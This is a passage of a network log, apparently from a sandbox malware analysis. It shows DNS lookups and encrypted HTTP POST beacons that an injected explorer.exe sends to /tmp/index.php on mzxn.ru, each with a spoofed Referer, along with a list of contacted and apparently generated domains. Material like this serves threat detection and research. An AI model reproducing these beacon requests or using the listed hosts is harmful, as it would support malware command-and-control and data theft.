                          Aug 6, 2024 14:51:50.459709883 CEST | 80 | 49777 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:54.150331020 CEST | 49778 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:54.155994892 CEST | 80 | 49778 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:54.156121969 CEST | 49778 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:54.156217098 CEST | 49778 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:54.156244040 CEST | 49778 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:54.161274910 CEST | 80 | 49778 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:54.161932945 CEST | 80 | 49778 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:55.336523056 CEST | 80 | 49778 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:55.337182999 CEST | 80 | 49778 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:55.337366104 CEST | 49778 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:55.337366104 CEST | 49778 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:55.342277050 CEST | 80 | 49778 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:59.419365883 CEST | 49779 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:59.424702883 CEST | 80 | 49779 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:59.424810886 CEST | 49779 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:59.424931049 CEST | 49779 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:59.424964905 CEST | 49779 | 80 | 192.168.2.4 | 190.187.52.42
                          Aug 6, 2024 14:51:59.429850101 CEST | 80 | 49779 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:51:59.430457115 CEST | 80 | 49779 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:52:00.583287001 CEST | 80 | 49779 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:52:00.583380938 CEST | 80 | 49779 | 190.187.52.42 | 192.168.2.4
                          Aug 6, 2024 14:52:00.583524942 CEST | 49779 | 80 | 192.168.2.4 | 190.187.52.42
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Aug 6, 2024 14:48:23.808614969 CEST | 61354 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:48:24.799757004 CEST | 61354 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:48:25.815249920 CEST | 61354 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:48:26.047180891 CEST | 53 | 61354 | 1.1.1.1 | 192.168.2.4
                          Aug 6, 2024 14:48:26.047480106 CEST | 53 | 61354 | 1.1.1.1 | 192.168.2.4
                          Aug 6, 2024 14:48:26.047781944 CEST | 53 | 61354 | 1.1.1.1 | 192.168.2.4
                          Aug 6, 2024 14:48:50.167984009 CEST | 51311 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:48:50.617371082 CEST | 53 | 51311 | 1.1.1.1 | 192.168.2.4
                          Aug 6, 2024 14:48:57.609970093 CEST | 65216 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:48:57.647706985 CEST | 53 | 65216 | 1.1.1.1 | 192.168.2.4
                          Aug 6, 2024 14:49:10.103430033 CEST | 59597 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:49:10.118927956 CEST | 53 | 59597 | 1.1.1.1 | 192.168.2.4
                          Aug 6, 2024 14:50:55.563322067 CEST | 54947 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:50:56.549593925 CEST | 54947 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:50:57.549750090 CEST | 54947 | 53 | 192.168.2.4 | 1.1.1.1
                          Aug 6, 2024 14:50:57.941947937 CEST | 53 | 54947 | 1.1.1.1 | 192.168.2.4
                          Aug 6, 2024 14:50:57.942003012 CEST | 53 | 54947 | 1.1.1.1 | 192.168.2.4
                          Aug 6, 2024 14:50:57.942032099 CEST | 53 | 54947 | 1.1.1.1 | 192.168.2.4
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Aug 6, 2024 14:48:23.808614969 CEST | 192.168.2.4 | 1.1.1.1 | 0xbda5 | Standard query (0) | mzxn.ru | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:24.799757004 CEST | 192.168.2.4 | 1.1.1.1 | 0xbda5 | Standard query (0) | mzxn.ru | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:25.815249920 CEST | 192.168.2.4 | 1.1.1.1 | 0xbda5 | Standard query (0) | mzxn.ru | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:50.167984009 CEST | 192.168.2.4 | 1.1.1.1 | 0xc30e | Standard query (0) | browserupdater.com | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:57.609970093 CEST | 192.168.2.4 | 1.1.1.1 | 0xe998 | Standard query (0) | mussangroup.com | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:49:10.103430033 CEST | 192.168.2.4 | 1.1.1.1 | 0x960d | Standard query (0) | mundoparachicas.space | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:55.563322067 CEST | 192.168.2.4 | 1.1.1.1 | 0x6e40 | Standard query (0) | mzxn.ru | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:56.549593925 CEST | 192.168.2.4 | 1.1.1.1 | 0x6e40 | Standard query (0) | mzxn.ru | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.549750090 CEST | 192.168.2.4 | 1.1.1.1 | 0x6e40 | Standard query (0) | mzxn.ru | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 189.163.127.97 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 109.175.29.39 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 211.40.39.251 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 191.191.224.16 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 186.145.236.93 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 211.202.224.10 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 190.13.174.94 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 200.63.106.141 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047180891 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 179.52.91.39 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 189.163.127.97 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 109.175.29.39 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 211.40.39.251 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 191.191.224.16 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 186.145.236.93 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 211.202.224.10 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 190.13.174.94 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 200.63.106.141 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047480106 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 179.52.91.39 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 189.163.127.97 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 109.175.29.39 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 211.40.39.251 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 191.191.224.16 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 186.145.236.93 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 211.202.224.10 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 190.13.174.94 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 200.63.106.141 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:26.047781944 CEST | 1.1.1.1 | 192.168.2.4 | 0xbda5 | No error (0) | mzxn.ru |  | 179.52.91.39 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:50.617371082 CEST | 1.1.1.1 | 192.168.2.4 | 0xc30e | No error (0) | browserupdater.com |  | 45.130.41.250 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:48:57.647706985 CEST | 1.1.1.1 | 192.168.2.4 | 0xe998 | No error (0) | mussangroup.com |  | 185.149.100.242 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:49:10.118927956 CEST | 1.1.1.1 | 192.168.2.4 | 0x960d | No error (0) | mundoparachicas.space |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:49:10.118927956 CEST | 1.1.1.1 | 192.168.2.4 | 0x960d | No error (0) | mundoparachicas.space |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 190.187.52.42 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 63.143.98.185 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 211.171.233.129 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 185.18.245.58 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 102.189.6.13 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 217.219.131.81 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 211.181.24.132 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 190.176.246.92 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.941947937 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 220.125.3.190 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 190.187.52.42 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 63.143.98.185 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 211.171.233.129 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 185.18.245.58 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 102.189.6.13 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 217.219.131.81 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 211.181.24.132 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 190.176.246.92 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942003012 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 220.125.3.190 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 190.187.52.42 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 63.143.98.185 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 211.171.233.129 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 185.18.245.58 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 102.189.6.13 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 217.219.131.81 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 211.181.24.132 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 190.176.246.92 | A (IP address) | IN (0x0001) | false
                          Aug 6, 2024 14:50:57.942032099 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e40 | No error (0) | mzxn.ru |  | 220.125.3.190 | A (IP address) | IN (0x0001) | false
                          • browserupdater.com
                          • mussangroup.com
                          • mundoparachicas.space
                          • lxtihacslghmp.net
                            • mzxn.ru
                          • wbqhwxcwiokrti.com
                          • yrcjsrfdprvic.com
                          • knlbxirdtde.org
                          • nbynuqvcubp.com
                          • uvlrqtxncwdcr.com
                          • fwffjwnakkt.net
                          • hlaxjpgxxibka.net
                          • qxykcmjeqiqyjoi.net
                          • vqtbeoidrbmewm.com
                          • sowqaemgjxhutlr.net
                          • qggmqqxdvbb.org
                          • cypfufcosssb.net
                          • asulighvhvx.org
                          • typuxgfkyjirf.org
                          • alapkefvafgo.net
                          • yclxfxgmqbvjkhy.org
                          • kiaaagbssjkd.net
                          • srhunmufdtubiva.net
                          • jmoobswoyynvmcc.net
                          • nepghogipjla.org
                          • pomgyqmowolnyuhi.com
                          • uxdwmdslnymyde.com
                          • idvimpvmdkks.org
                          • bekxhhsmaopjub.net
                          • gjmkiqrlvkslwsem.org
                          • mgctvlvgdog.org
                          • keqkgetrekoo.net
                          • vqvtaxxtrjbp.net
                          • ovdrqgaphhsrkg.org
                          • jgwoffhiempfd.net
                          • biwmwjkqpuwangh.com
                          • ydamtofmlce.net
                          • yyvupavchggrcv.org
                          • doftqgthwcaw.org
                          • nddnnutqhypaj.com
                          • nmxuerpvqdsp.com
                          • hmylssppqcui.org
                          • viiuigfvqxtv.com
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49736 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:48:26.054833889 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://lxtihacslghmp.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 278
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:26.054867029 CEST | 278 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 48 fe b8
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuBHjpi fe Me'GZMbT4+M YypbY>Mz/po-/#IFjlW~yVM(
                          Aug 6, 2024 14:48:27.855571032 CEST | 152 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:27 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 04 00 00 00 72 e8 85 e9
                          Data Ascii: r


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49737 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:48:27.864784956 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://wbqhwxcwiokrti.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 281
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:27.864795923 CEST | Bytes transferred: 281 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 2f 5f b5 83
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu/_H`Oict^m63p82v~b(8;H(CJu$O#z0/c^lV[HPv?}2hKO@1aG%+Y
                          Timestamp: Aug 6, 2024 14:48:29.413307905 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:29 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:29.421967983 CEST | Bytes transferred: 278 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://yrcjsrfdprvic.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 302
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:29.422071934 CEST | Bytes transferred: 302 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 49 5e ae f2
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vuI^V5MqcX%`iGbx3eFoHSAD^:LW^\.n%j[8XCEbP4X3uzxa[A?KC
                          Timestamp: Aug 6, 2024 14:48:30.928253889 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:30 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:30.935853004 CEST | Bytes transferred: 276 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://knlbxirdtde.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 162
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:30.935872078 CEST | Bytes transferred: 162 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 65 4a ea 89
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vueJdUqmr!q4z<rA"BW kY'Cf6Jb
                          Timestamp: Aug 6, 2024 14:48:32.419202089 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:32 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:32.427371979 CEST | Bytes transferred: 276 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://nbynuqvcubp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 154
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:32.427392960 CEST | Bytes transferred: 154 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4b 06 d9 9f
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vuKH.HB,dC[/8{6[AIFO1f<9
                          Timestamp: Aug 6, 2024 14:48:33.946558952 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:33 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:33.954813957 CEST | Bytes transferred: 278 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://uvlrqtxncwdcr.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 369
                          Host: mzxn.ru
